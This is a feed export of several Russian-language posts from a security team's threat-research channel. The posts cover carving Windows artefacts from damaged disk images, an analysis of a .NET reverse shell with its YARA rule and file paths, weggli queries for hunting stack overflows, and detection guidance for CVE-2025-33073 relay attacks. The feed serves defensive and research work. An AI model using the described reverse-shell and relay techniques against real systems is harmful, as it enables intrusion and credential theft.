<figure class="wp-block-image"><img width="1024" height="406" src="/wp-content/uploads/2025/12/photo_446@05-12-2025_16-58-39-1024x406.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/12/photo_446@05-12-2025_16-58-39-1024x406.jpg 1024w, /wp-content/uploads/2025/12/photo_446@05-12-2025_16-58-39-300x119.jpg 300w, /wp-content/uploads/2025/12/photo_446@05-12-2025_16-58-39-768x305.jpg 768w, /wp-content/uploads/2025/12/photo_446@05-12-2025_16-58-39.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="294" src="/wp-content/uploads/2025/12/photo_447@05-12-2025_16-58-39-1024x294.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/12/photo_447@05-12-2025_16-58-39-1024x294.jpg 1024w, /wp-content/uploads/2025/12/photo_447@05-12-2025_16-58-39-300x86.jpg 300w, /wp-content/uploads/2025/12/photo_447@05-12-2025_16-58-39-768x221.jpg 768w, /wp-content/uploads/2025/12/photo_447@05-12-2025_16-58-39.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="828" height="1024" src="/wp-content/uploads/2025/12/photo_448@05-12-2025_16-58-39-828x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/12/photo_448@05-12-2025_16-58-39-828x1024.jpg 828w, /wp-content/uploads/2025/12/photo_448@05-12-2025_16-58-39-243x300.jpg 243w, /wp-content/uploads/2025/12/photo_448@05-12-2025_16-58-39-768x950.jpg 768w, /wp-content/uploads/2025/12/photo_448@05-12-2025_16-58-39.jpg 1035w" sizes="auto, (max-width: 828px) 100vw, 828px" /></figure>

<br />
<br />
<span class="hashtag">#TI</span> <span class="hashtag">#Phishing</span> <span class="hashtag">#malware</span> <span class="hashtag">#win</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a>]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Извлечение данных из образов дисков с поврежденной ФС</title>
		<link>/extracting-data-from-disk-images-with-a-damaged-file-system/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Wed, 03 Dec 2025 14:57:53 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[win]]></category>
		<category><![CDATA[yara]]></category>
		<guid isPermaLink="false">http://localhost:8080/%d0%b4%d0%bb%d1%8f-%d0%bf%d0%be%d0%b8%d1%81%d0%ba%d0%b0-%d0%be%d1%81%d1%82%d0%b0%d1%82%d0%be%d1%87%d0%bd%d1%8b%d1%85-%d0%b4%d0%b0%d0%bd%d0%bd%d1%8b%d1%85-%d1%82%d0%b0%d0%b1%d0%bb%d0%b8%d1%86%d1%8b/</guid>

					<description><![CDATA[He may not, as unvalued persons do, Carve for himself (W. Shakespeare) При расследовании в инфраструктуре, подвергшейся шифрованию, регулярно возникает необходимость извлечения данных из образов дисков, где файловая система существенно повреждена. В…]]></description>
										<content:encoded><![CDATA[<blockquote><p>He may not, as unvalued persons do, Carve for himself (W. Shakespeare)</p></blockquote>
<p><em><br />
</em><br />
При расследовании в инфраструктуре, подвергшейся шифрованию, регулярно возникает необходимость извлечения данных из образов дисков, где файловая система существенно повреждена.</p>
<p>В таких случаях извлечь данные <code>MFT</code>, логи ОС или юзерские артефакты в состоянии, пригодном для обработки классическими инструментами, возможно далеко не всегда. Это порождает необходимость применения карвинга — восстановления или реконструкции поврежденных файлов. В ряде случаев доступные коммерческие инструменты, реализующие данную технику, дают неплохие результаты, но в целом имеют достаточно ограниченную область применения.</p>
<p>В случае карвинга событий журналов ОС Windows хорошо зарекомендовала себя техника «забудь про BinXML»: для полноценного декодирования содержимого полей единичного события необходимы шаблоны, хранящиеся в заголовке чанка, который по понятным причинам может просто отсутствовать. Не пытаясь даже искать такие шаблоны, можно составить текстовое описание единичного события, где однозначно выделяются даты, хранимые в стандартных расположениях, коды событий и несколько других служебных полей, а также декодируемые «как текст» (с вырезанием служебных последовательностей <code>BinXML</code>) байтовые последовательности, содержащие данные для подстановки в шаблоны.</p>
<p>В итоге подобная техника позволяет получить существенно больше данных, нежели при попытке восстановления чанков <code>EVTX</code>: имея дату, код события <code>EventID</code> и тип журнала, хранимый в виде текста, можно понять, о чем идет речь (<em>скриншот 1</em>).</p>
<p>Схожий подход может применяться и для «живых» систем, где атакующие предприняли попытку удаления данных с целью сокрытия следов своих перемещений.</p>
<p>🔎 <strong>Для поиска остаточных данных таблицы </strong><code>MFT</code>, помимо восстановления единичных записей стандартного формата, в ряде случаев хорошо работает техника поиска единичных атрибутов: как правило, ценность представляют атрибуты типа <code>0x30</code>, то есть <code>$FILE_NAME</code>, содержащие четыре метки времени, имя файла и его размер (<em>скриншот 2</em>). В отдельных случаях такие единичные атрибуты даже для «живой» системы позволяют обнаружить, например, в файле подкачки (<code>pagefile.sys</code>) следы присутствия вредоносных файлов, отсутствующие в других артефактах. Подобные результаты также возможно получить с помощью поиска USN-записей, содержащих одну метку времени и имя файла, с которым производились какие-либо операции ФС (<em>скриншот 3</em>).</p>
<p>💽 <strong>Для поиска исполняемых файлов в образе диска</strong> хорошо работает тактика поиска заголовка <code>PE</code> с последующей оценкой размера файла по совокупному размеру секций. При небольшом усложнении алгоритма возможно реализовать более точный подход: определение энтропии конечных фрагментов файла с последовательным уменьшением размера фрагмента до момента перехода эмпирически определенного порогового значения «снизу вверх» при соблюдении паддинга в ряде случаев позволяет получить исполняемые файлы с совпадением по хешу. Однако даже «вырубленные топором» исполняемые файлы ВПО или их фрагменты прекрасно детектируются с помощью YARA-правил (<em>скриншоты 4, 5)</em>.</p>
<p>📁 <strong>Для восстановления файлов реестра</strong> возможно использование поиска по заголовку с определением размера файла по полю <code>HiveBinsDataSize</code>: данное приближение в ряде случаев позволяет получить набор файлов, пригодных для обработки классическими инструментами. Характерной особенностью в данном случае является наличие в заголовке даты модификации и типа файла (<code>primary/log</code>), а также имени файла в <code>UTF-16</code> размером <code>64 байта</code>. Несмотря на то что для некоторых потенциально интересных с точки зрения форензики файлов (<code>UsrClass.dat</code>) структура пути не позволяет определить с достаточной точностью исходное размещение файла, для большинства случаев имеющейся информации вполне достаточно.</p>
<p>Наконец, прекрасно зарекомендовала себя техника поиска в образе диска читаемых текстовых фрагментов, ассоциируемых с выявленным инструментарием атакующих: в ряде случаев она позволяет восстановить командлайны и логи использованных инструментов, включая пароли, имена УЗ и подобные «приятные мелочи» (<em>скриншот 6</em>).</p>
<figure class="wp-block-image"><img width="1024" height="917" src="/wp-content/uploads/2025/12/photo_439@03-12-2025_14-57-53-1024x917.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/12/photo_439@03-12-2025_14-57-53-1024x917.jpg 1024w, /wp-content/uploads/2025/12/photo_439@03-12-2025_14-57-53-300x269.jpg 300w, /wp-content/uploads/2025/12/photo_439@03-12-2025_14-57-53-768x688.jpg 768w, /wp-content/uploads/2025/12/photo_439@03-12-2025_14-57-53.jpg 1178w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="816" height="1024" src="/wp-content/uploads/2025/12/photo_440@03-12-2025_14-57-53-816x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/12/photo_440@03-12-2025_14-57-53-816x1024.jpg 816w, /wp-content/uploads/2025/12/photo_440@03-12-2025_14-57-53-239x300.jpg 239w, /wp-content/uploads/2025/12/photo_440@03-12-2025_14-57-53-768x964.jpg 768w, /wp-content/uploads/2025/12/photo_440@03-12-2025_14-57-53.jpg 1020w" sizes="auto, (max-width: 816px) 100vw, 816px" /></figure>
<figure class="wp-block-image"><img width="816" height="1024" src="/wp-content/uploads/2025/12/photo_441@03-12-2025_14-57-53-816x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/12/photo_441@03-12-2025_14-57-53-816x1024.jpg 816w, /wp-content/uploads/2025/12/photo_441@03-12-2025_14-57-53-239x300.jpg 239w, /wp-content/uploads/2025/12/photo_441@03-12-2025_14-57-53-768x964.jpg 768w, /wp-content/uploads/2025/12/photo_441@03-12-2025_14-57-53.jpg 1020w" sizes="auto, (max-width: 816px) 100vw, 816px" /></figure>
<figure class="wp-block-image"><img width="1024" height="336" src="/wp-content/uploads/2025/12/photo_442@03-12-2025_14-57-53-1024x336.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/12/photo_442@03-12-2025_14-57-53-1024x336.jpg 1024w, /wp-content/uploads/2025/12/photo_442@03-12-2025_14-57-53-300x99.jpg 300w, /wp-content/uploads/2025/12/photo_442@03-12-2025_14-57-53-768x252.jpg 768w, /wp-content/uploads/2025/12/photo_442@03-12-2025_14-57-53.jpg 1178w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="810" src="/wp-content/uploads/2025/12/photo_443@03-12-2025_14-57-53-1024x810.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/12/photo_443@03-12-2025_14-57-53-1024x810.jpg 1024w, /wp-content/uploads/2025/12/photo_443@03-12-2025_14-57-53-300x237.jpg 300w, /wp-content/uploads/2025/12/photo_443@03-12-2025_14-57-53-768x608.jpg 768w, /wp-content/uploads/2025/12/photo_443@03-12-2025_14-57-53.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p><span class="hashtag">#yara</span> <span class="hashtag">#dfir</span> <span class="hashtag">#ir</span> <span class="hashtag">#windows</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Новое подключение к старым техникам</title>
		<link>/new-connection-to-old-techniques/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Wed, 26 Nov 2025 14:04:40 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[TI]]></category>
		<category><![CDATA[win]]></category>
		<category><![CDATA[yara]]></category>
		<guid isPermaLink="false">http://localhost:8080/%d0%bd%d0%be%d0%b2%d0%be%d0%b5-%d0%bf%d0%be%d0%b4%d0%ba%d0%bb%d1%8e%d1%87%d0%b5%d0%bd%d0%b8%d0%b5-%d0%ba-%d1%81%d1%82%d0%b0%d1%80%d1%8b%d0%bc-%d1%82%d0%b5%d1%85%d0%bd%d0%b8%d0%ba%d0%b0%d0%bc/</guid>

					<description><![CDATA[Новое подключение к старым техникам 📡 В ходе расследования инцидентов команда PT ESC IR обнаружила реверс-шелл, разработанный на .NET и наблюдаемый с 2023 года. Злоумышленниками он использовался для управления скомпрометированными хостами. ВПО…]]></description>
										<content:encoded><![CDATA[<strong>Новое подключение к старым техникам</strong> 📡<br />
<br />
В ходе расследования инцидентов команда PT ESC IR обнаружила реверс-шелл, разработанный на .NET и наблюдаемый с 2023 года. Злоумышленниками он использовался для управления скомпрометированными хостами. ВПО создает процесс <code>cmd.exe</code> и перенаправляет поток ввода/вывода на управляющий сервер, который, как правило, являлся одним из хостов во внутренней инфраструктуре. Для безопасного сетевого соединения использовалась техника защищенного TCP-клиента с SSL/TLS.<br />
<br />
❕ Особенность инструмента в том, что он реализован средствами компонента <code>System.Windows.Data</code> из состава Windows Presentation Framework. Сама техника не новая — примитивы выполнения кода с использованием <code>System.Windows.Data</code> активно применяются при эксплуатации уязвимостей. Рассмотрим его реализацию подробнее.<br />
<br />
В функции <code>Main</code> (<em>скриншот 1</em>) демонстрируется техника прямого выполнения через <code>ObjectDataProvider</code> из пространства имен <code>System.Windows.Data</code>. Несмотря на отсутствие явного вызова метода, при последовательной настройке свойств <code>ObjectInstance</code>, <code>MethodParameters</code> и, в завершение, <code>MethodName</code> объект автоматически инициирует выполнение указанного метода (<code>Connect.Start</code>) — прямо во время его инициализации в методе <code>Main</code>. Использование обертки <code>ExpandedWrapper&lt;Connect, ObjectDataProvider&gt;</code> указывает на заимствование паттерна из известных gadget-цепочек для десериализации, хотя в данном случае эксплуатация происходит напрямую, без этапа сериализации.<br />
<br />
Метод <code>Connect.Start</code> (<em>скриншот 2</em>) запускает системную командную оболочку (<code>cmd.exe</code>) в качестве дочернего процесса, асинхронно перехватывает ее вывод через обработчик <code>P_OutputDataReceived</code> и перенаправляет данные обратно на C2-сервер, одновременно используя кастомный делегат (<code>Delegate.Combine</code>) для динамической связи с компонентом <code>Px</code>, отвечающим за сетевую передачу команд и результатов. Такая архитектура позволяет злоумышленнику выполнять произвольные команды в контексте <code>cmd.exe</code> на зараженной машине, сохраняя взаимодействие основанным на легитимных API .NET.<br />
<br />
В методе <code>Net.Run</code> (<em>скриншот 3</em>) реализована сетевая C2-логика, устанавливающая зашифрованное соединение с удаленным сервером через <code>TcpClient</code> и <code>SslStream</code> с принудительным использованием TLS 1.2; IP-адрес и порт берутся из зашифрованных конфигурационных данных (<em>скриншот 4</em>) и расшифровываются «на лету» с помощью AES256 в режиме <code>CBC/NoPadding</code>, причем для генерации ключа используется PBKDF2 (RFC 2898), на вход которого передается строковое значение пароля и соли (<em>скриншот 5</em>).<br />
<br />
<strong>Для расшифровки данных конфигурации можно воспользоваться следующими рецептами CyberChef:</strong><br />
<br />
1. <a href="https://gchq.github.io/CyberChef/#recipe=Derive_PBKDF2_key(%7B&#039;option&#039;:&#039;Latin1&#039;,&#039;string&#039;:&#039;&#039;%7D,256,1000,&#039;SHA1&#039;,%7B&#039;option&#039;:&#039;Latin1&#039;,&#039;string&#039;:&#039;&#039;%7D)" rel="noopener" target="_blank">Генерация ключа,</a> в который необходимо передать <code>App.PasswordHash</code> и <code>App.SaltKey</code>;<br />
<br />
2. <a href="https://gchq.github.io/CyberChef/#recipe=From_Base64(&#039;A-Za-z0-9%2B/%3D&#039;,true,false)AES_Decrypt(%7B&#039;option&#039;:&#039;Hex&#039;,&#039;string&#039;:&#039;&#039;%7D,%7B&#039;option&#039;:&#039;Latin1&#039;,&#039;string&#039;:&#039;&#039;%7D,&#039;CBC/NoPadding&#039;,&#039;Raw&#039;,&#039;Raw&#039;,%7B&#039;option&#039;:&#039;Hex&#039;,&#039;string&#039;:&#039;&#039;%7D,%7B&#039;option&#039;:&#039;Hex&#039;,&#039;string&#039;:&#039;&#039;%7D)" rel="noopener" target="_blank">Алгоритм расшифровки.</a><br />
<br />
🗂 <strong>Вредоносные файлы были расположены в легитимных каталогах:
</strong><br />
<strong>• </strong>C:\Program Files\Internet Explorer\mshealthupdate.exe<br />
<br />
<strong>• </strong>C:\Program Files\Common Files\System\msadds.exe<br />
<br />
<strong>• </strong>C:\Program Files\Common Files\System\ado\msader.exe<br />
<br />
Для закрепления в инфраструктуре и запуска исполняемых файлов злоумышленники использовали планировщик задач Windows.<br />
<br />
Данный инструмент схож с реализацией общеизвестной утилиты <code>ncat</code>. Для вызова вредоносного метода используется легитимный класс <code>ObjectDataProvider</code> из системной библиотеки <code>WPF</code>, применяются делегаты для динамического подключения обработчиков, не оставляя четкой цепочки вызовов в IL-коде. Для шифрования вывода консоли используется TLS 1.2 и игнорируются ошибки сертификата (<code>ValidateServerCertificate =&gt; true</code>), что позволяет работать с любым C2, включая динамические IP.<br />
<br />
<strong>YARA:</strong><br />
<br />
<pre class="wp-block-code"><span><code lang="powershell" class="hljs language-powershell language-powershell">rule MSADDShell {
    strings:
        <span class="hljs-variable">$v1</span> = <span class="hljs-string">"net_handlerDelOutDataNet"</span>
        <span class="hljs-variable">$v2</span> = <span class="hljs-string">"P_OutputDataReceived"</span>
        <span class="hljs-variable">$v3</span> = <span class="hljs-string">"add_OutputDataReceived"</span>
        <span class="hljs-variable">$v4</span> = <span class="hljs-string">"SendDataFwd"</span>
        <span class="hljs-variable">$v5</span> = <span class="hljs-string">"OnhandlerDelFwfPx"</span>
        <span class="hljs-variable">$v6</span> = <span class="hljs-string">"OnhandlerDelOutDataNet"</span>
        <span class="hljs-variable">$v7</span> = <span class="hljs-string">"msadds.exe"</span> wide
    condition:
        uint16(<span class="hljs-number">0</span>) == <span class="hljs-number">0</span>x5A4D and <span class="hljs-number">5</span> of (<span class="hljs-variable">$v</span>*) and filesize &lt; <span class="hljs-number">100</span>KB
}</code></span></pre>

<figure class="wp-block-image"><img width="1024" height="640" src="/wp-content/uploads/2025/11/photo_432@26-11-2025_14-04-40-1024x640.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/11/photo_432@26-11-2025_14-04-40-1024x640.jpg 1024w, /wp-content/uploads/2025/11/photo_432@26-11-2025_14-04-40-300x188.jpg 300w, /wp-content/uploads/2025/11/photo_432@26-11-2025_14-04-40-768x480.jpg 768w, /wp-content/uploads/2025/11/photo_432@26-11-2025_14-04-40.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="640" src="/wp-content/uploads/2025/11/photo_433@26-11-2025_14-04-40-1024x640.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/11/photo_433@26-11-2025_14-04-40-1024x640.jpg 1024w, /wp-content/uploads/2025/11/photo_433@26-11-2025_14-04-40-300x188.jpg 300w, /wp-content/uploads/2025/11/photo_433@26-11-2025_14-04-40-768x480.jpg 768w, /wp-content/uploads/2025/11/photo_433@26-11-2025_14-04-40.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="640" src="/wp-content/uploads/2025/11/photo_434@26-11-2025_14-04-40-1024x640.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/11/photo_434@26-11-2025_14-04-40-1024x640.jpg 1024w, /wp-content/uploads/2025/11/photo_434@26-11-2025_14-04-40-300x188.jpg 300w, /wp-content/uploads/2025/11/photo_434@26-11-2025_14-04-40-768x480.jpg 768w, /wp-content/uploads/2025/11/photo_434@26-11-2025_14-04-40.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="640" src="/wp-content/uploads/2025/11/photo_435@26-11-2025_14-04-40-1024x640.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/11/photo_435@26-11-2025_14-04-40-1024x640.jpg 1024w, /wp-content/uploads/2025/11/photo_435@26-11-2025_14-04-40-300x188.jpg 300w, /wp-content/uploads/2025/11/photo_435@26-11-2025_14-04-40-768x480.jpg 768w, /wp-content/uploads/2025/11/photo_435@26-11-2025_14-04-40.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>

<br />
<br />
<span class="hashtag">#IOC</span> <span class="hashtag">#yara</span> <span class="hashtag">#dfir</span> <span class="hashtag">#detect</span> <span class="hashtag">#win</span> <span class="hashtag">#ti</span> <span class="hashtag">#ir</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a>]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>How to CVE-2025-54916? Low-effort vulnerability research</title>
		<link>/how-to-cve-2025-54916-low-effort-vulnerability-research/</link>
		
		<dc:creator><![CDATA[author_vr]]></dc:creator>
		<pubDate>Mon, 15 Sep 2025 11:41:37 +0000</pubDate>
				<category><![CDATA[Vulnerability Research]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[escvr]]></category>
		<category><![CDATA[win]]></category>
		<guid isPermaLink="false">http://localhost:8080/how-to-cve-2025-54916-low-effort-vulnerability-research/</guid>

					<description><![CDATA[How to CVE-2025-54916? Low-effort vulnerability research 💻 Привет, на связи ESC-VR. Формат поста в телеграме редко подходит для разборов комплексных уязвимостей, но баг, найденный нами в недрах NTFS, исправленный сентябрьским патчем, можно…]]></description>
										<content:encoded><![CDATA[<strong>How to CVE-2025-54916? Low-effort vulnerability research</strong> 💻<br />
<br />
Привет, на связи ESC-VR.<br />
<br />
Формат поста в телеграме редко подходит для разборов комплексных уязвимостей, но баг, найденный нами в недрах NTFS, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54916" rel="noopener" target="_blank">исправленный сентябрьским патчем</a>, можно было найти весьма необычным способом (<em>и мы смогли уложить рассказ об этом в пост</em>).<br />
<br />
Если вы интересуетесь анализом уязвимостей, наверняка слышали про CodeQL, SonarQube, Snyk, Semgrep — классические SAST-системы. Их общий минус: чаще всего нужен полный доступ к исходникам. Когда его нет, ценность таких инструментов быстро стремится к нулю, а сложность запросов мешает применять их к декомпилированным листингам или фрагментам кода.<br />
<br />
Нужно что-то простое, с понятным языком запросов и без требования полной кодовой базы. Такое решение есть — это <a href="https://github.com/weggli-rs/weggli" rel="noopener" target="_blank">weggli-rs</a>: интерактивная, консольная утилита для выполнения семантического поиска. Она подходит для поиска по декомпилированным листингам и частичным кодовым базам.<br />
<br />
Что мы называем «частичными кодовыми базами»? Например, утекшие исходники Windows XP SP1, <a href="https://www.zdnet.com/article/windows-xp-leak-confirmed-after-user-compiles-the-leaked-code-into-a-working-os/" rel="noopener" target="_blank">слитые</a> в 2020 году. Несмотря на возраст, это бесценный источник знаний о внутренностях современной Windows.<br />
<br />
🎯 <strong>Наша цель:</strong> найти классические переполнения стека через вызовы <code>memcpy</code>/<code>memmove</code>. Ищем функцию, где:<br />
<br />
• на стеке объявлен буфер;<br />
• есть вызов <code>memcpy</code>/<code>memmove</code>;<br />
• в первый аргумент передается адрес этого стекового буфера.<br />
<br />
Этого достаточно, чтобы собрать множество кандидатов на stack buffer overflow (не все, но многие). Запрос на weggli:<br />
<br />
<pre class="wp-block-code"><span><code lang="powershell" class="hljs language-powershell language-powershell">weggli <span class="hljs-literal">-R</span> <span class="hljs-string">"<span class="hljs-variable">$func</span>=RtlCopyMemory|memmove|memcpy"</span> <span class="hljs-string">"_ <span class="hljs-variable">$v</span>; <span class="hljs-variable">$func</span>(&amp;<span class="hljs-variable">$v</span>,_,_)"</span>
</code></span></pre><br />
<br />
Дальше нужно сужать выборку. Например, требуем, чтобы размер копируемого буфера задавался выражением с вычитанием. Таким образом мы подсвечиваем места с риском целочисленного underflow:<br />
<br />
<pre class="wp-block-code"><span><code lang="powershell" class="hljs language-powershell language-powershell">weggli.exe <span class="hljs-literal">-R</span> <span class="hljs-string">"<span class="hljs-variable">$func</span>=RtlCopyMemory|memmove|memcpy"</span> <span class="hljs-string">"_ <span class="hljs-variable">$v</span>; <span class="hljs-variable">$func</span>(&amp;<span class="hljs-variable">$v</span>,_,_(_-_))"</span>
</code></span></pre><br />
<br />
Уязвимость, закрытую в сентябре, можно было подсветить таким запросом:<br />
<br />
<pre class="wp-block-code"><span><code lang="powershell" class="hljs language-powershell language-powershell">weggli <span class="hljs-literal">-R</span> <span class="hljs-string">"<span class="hljs-variable">$func</span>=RtlCopyMemory|memmove|memcpy"</span> <span class="hljs-string">"_ <span class="hljs-variable">$v</span>; <span class="hljs-variable">$func</span>(&amp;<span class="hljs-variable">$v</span>,_,_(<span class="hljs-variable">$a</span>-&gt;<span class="hljs-variable">$b</span>))
</span></code></span></pre><br />
<br />
<strong>В данном шаблоне мы ищем все функции, в которых:</strong><br />
<br />
• на стеке объявлен буфер;<br />
• есть вызов <code>memcpy</code>/<code>memmove</code>;<br />
• в первый аргумент передается адрес этого стекового буфера;<br />
• размер копируемого буфера определяется полем какой бы то ни было структуры.<br />
<br />
В заключение мы призываем вас попробовать использовать weggli-rs и найти исправленную уязвимость в исходном коде Windows XP SP1.<br />
<br />
HINT: <span class="spoiler">кажется, искать нужно в base/fs, а в названии уязвимой функции было что-то связанное с записью в лог или еще куда</span> 😏<br />
<br />
А если вы хотите узнать, как стриггерить эту уязвимость, то ознакомьтесь с <a href="https://swarm.ptsecurity.com/buried-in-the-log-exploiting-a-20-years-old-ntfs-vulnerability/" rel="noopener" target="_blank">нашим предыдущим исследованием</a>, опубликованным в блоге PT SWARM.<br />
<br />
<span class="hashtag">#escvr</span> <span class="hashtag">#cve</span> <span class="hashtag">#win</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a>]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Детектирование CVE-2025-33073</title>
		<link>/detection-of-cve-2025-33073/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Fri, 27 Jun 2025 17:40:56 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[rules]]></category>
		<category><![CDATA[sigma]]></category>
		<category><![CDATA[win]]></category>
		<guid isPermaLink="false">/%d0%b2-%d0%bf%d1%80%d0%be%d0%b4%d0%be%d0%bb%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5/</guid>

					<description><![CDATA[В продолжение предыдущих публикаций рассказываем, как обнаруживать уязвимость CVE-2025-33073 🕵️‍♂️ 1️⃣ Отслеживать DNS-запросы с Marshalled-суффиксом В атаках Reflection Relay злоумышленник вынуждает службы выполнять DNS-запросы к поддельным именам с паттерном 1UWhRCA + 37–45…]]></description>
										<content:encoded><![CDATA[<p><strong>В продолжение </strong><a href="https://t.me/ptescalator/389" rel="noopener" target="_blank">предыдущих публикаций</a><strong> рассказываем, как обнаруживать уязвимость CVE-2025-33073</strong> 🕵️‍♂️</p>
<p>1️⃣<strong> Отслеживать DNS-запросы с Marshalled-суффиксом</strong></p>
<p>В атаках Reflection Relay злоумышленник вынуждает службы выполнять DNS-запросы к поддельным именам с паттерном <code>1UWhRCA</code> + 37–45 символов Base64. Записи вида <code>srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.example.com</code> или <code>localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.example.com</code> — индикаторы попытки Reflection Relay (NTLM, Kerberos).</p>
<p><strong>• Что мониторить</strong></p>
<p>Все DNS-запросы, где имя узла заканчивается на marshalled-часть (<code>1UWhRCA</code> + 37-45 символов Base64).</p>
<p><strong>• События</strong></p>
<p>Sysmon Event ID 22 (DNS-запросы на узлах).</p>
<p>События DNS-серверов, содержащие такие запросы.</p>
<p>2️⃣<strong> Ловить LDAP-поиск с marshalled-суффиксом</strong></p>
<p>Reflection Relay вызывает LDAP-запросы от атакуемого узла к контроллеру домена, в которых параметр <code>name= </code>содержит поддельное DNS-имя формата <code>[имя_узла]1UWhRCA[Base64]</code>. Это происходит при выполнении Relay-атаки обратно на жертву.</p>
<p><strong>• Что мониторить:</strong></p>
<p>Запросы LDAP, в которых параметр <code>name=</code> содержит конструкцию: <br />
<code>&quot;[имя_хоста]1UWhRCA[символы Base64]&quot;</code></p>
<p><strong>• События: </strong></p>
<p>Windows Security Event 1644 (&quot;A search was performed in Active Directory&quot;) на контроллерах домена.</p>
<p>3️⃣<strong> Знать механику CVE-2025-33073 и Coerce-атаки</strong></p>
<p><strong>Как работает уязвимость:</strong></p>
<p>• Coerce-атаки (PetitPotam, PrinterBug) вынуждают жертву подключиться к поддельному DNS-имени.<br />
• Windows ошибочно считает запрос локальным из-за marshalled-суффикса, отключая проверки NTLM и Kerberos.<br />
• Это позволяет атакующему выполнить Relay сессии обратно на жертву для получения RCE с правами SYSTEM.</p>
<p><strong>Примеры Coerce-атак:</strong></p>
<p><strong>• PetitPotam:</strong> принуждение через уязвимость в EFS RPC, заставляющее LSASS инициировать аутентификацию;<br />
<strong>• PrinterBug:</strong> принудительная отправка NTLM-хешей через уязвимость в службе печати Windows (MS-RPRN).</p>
<p>4️⃣ <strong>Опираться на примеры сработавших правил корреляции</strong></p>
<p>При реализации CVE-2025-33073 совместно с PetitPotam для дампа учетных данных сработали следующие правила корреляции:</p>
<p><strong>• Coerce_Auth: </strong>правило обнаруживает Coerce-атаки на узел с целью перехвата хеша машинной учетной записи атакованного узла, а также пытается определить по названию используемого пайпа, какая техника атаки используется (netdfs = DFSCoerce; spoolss = PrinterBug; fssagentrpc = ShadowCoerce; efsrpc, lsarpc, samr, lsass, netlogon = PetitPotam; msftewds = WSPCoerce) и какой инструмент применяется.</p>
<p><strong>• SVCCTL_Connection:</strong> правило обнаруживает подключение к именованному каналу <code>svcctl</code>, который ответственен за удаленное конфигурирование служб Windows на узлах через Service Control Manager, что может привести к выполнению произвольного кода;</p>
<p><strong>•</strong> <strong>Remote_Password_Dump:</strong> правило обнаруживает удаленный дамп паролей через обращение к именованному каналу <code>WINREG</code>.</p>
<p>5️⃣ <strong>Использовать примеры SIGMA-правил</strong></p>
<p>Если у вас нет MaxPatrol SIEM, то вот вам пример простых SIGMA-правил:</p>
<p><a href="https://telegra.ph/SIGMA-pravilo-dlya-Sysmon-Event-ID-22-06-27" rel="noopener" target="_blank">Для Sysmon Event ID 22</a>.</p>
<p><a href="https://telegra.ph/SIGMA-pravilo-dlya-Windows-Security-Event-1644-06-27" rel="noopener" target="_blank">Для Windows Security Event 1644</a>.</p>
<p>6️⃣ <strong>Использовать наши публичные Suricata-</strong><a href="https://rules.ptsecurity.com/view/rules/ptopen-windows.rules#L53" rel="noopener" target="_blank">сигнатуры</a><strong> </strong>для обнаружения этой атаки</p>
